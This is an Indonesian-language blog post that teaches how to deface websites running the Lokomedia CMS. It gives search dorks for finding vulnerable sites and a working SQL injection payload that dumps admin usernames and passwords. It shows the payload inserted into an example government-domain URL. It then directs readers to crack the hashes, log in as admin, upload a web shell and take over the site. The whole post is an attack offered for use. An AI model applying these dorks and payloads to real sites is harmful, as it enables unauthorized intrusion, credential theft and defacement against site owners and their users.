Hallo Guys;v
Balik Lagi Yekan Ama Gw:v
_/|Mr.Kancil303
Kali Ini Gw bakal Share Ilmu Lagi:v
Yaitu Cara deface Method SQL Lokomedia
Lanjut Gan:v
Siapin Dulu Bahan"nya tod
~ Dork
• inurl:statis-1-profil.html
inurl:statis-2-profil.html
• inurl:statis-3-strukturorganisasi.html
• intext:lokomedia inurl:statis- ext:html
• intext:lokomedia inurl:kategori- 6 - .html
• intext:lokomedia inurl:semua- ext:html
• inurl:kategori-32-daerah.html site:.com
• intext:copyright by inurl:statis-1 ext:html
~ Kuota
~ Kopi
~ Rokok:v
~ Exploit
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
Tutorial ::
1.Dorking Dulu Tod Pake Dork Yang Di Atas,Kembangin Lagi Dorknya Biar Dapet Yang Perawan ;v
2. Pilih site Target yang Kira" bisa Di tusbol:v
3. Contoh Target gw
https://sitetarget.go.id/home/statis-1-profil.html
4. Masukin Exploitnya Yang diatas Tadi
Contoh :
https://sitetarget.go.id/home/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html
Nah Kea Gitu Tod
Kalo Vuln Ntar Nongol Username,Password Adminnya
Kalo Kaga Ya Cari Lagi Lah Anjenk
5. Biasanya Sih Kalo Passwordnya Nongol Tuh Harus Di Crack Lagi ;v
Tapi kalo Lu Hoki Ya kaga Ngecrack Lagi Njenk
Nih web Crack Passnya
http://hashkiller.co.uk/Cracker/MD5
6. Next....
Cari Admin Loginnya
Kalo nemu
Login Pake User Pass Yang Nongol Tadi
Berhasil Login?
Cari Tempat Upload
Upload Dah Shell/SC Depes Burique Klean
U know Lah Diapain Lagi;v
Cari Aksesnya>Tebas
Sekian Dari Gw...
Bila ada Salah Kata Gw
Mohon Di Maapkeun Yak Anjenk>:(
Regards Team :: B.S.C.A EXPLOITER TEAM
Copyright©2K19 _/|MR.KANCIL303
Tidak ada komentar:
Posting Komentar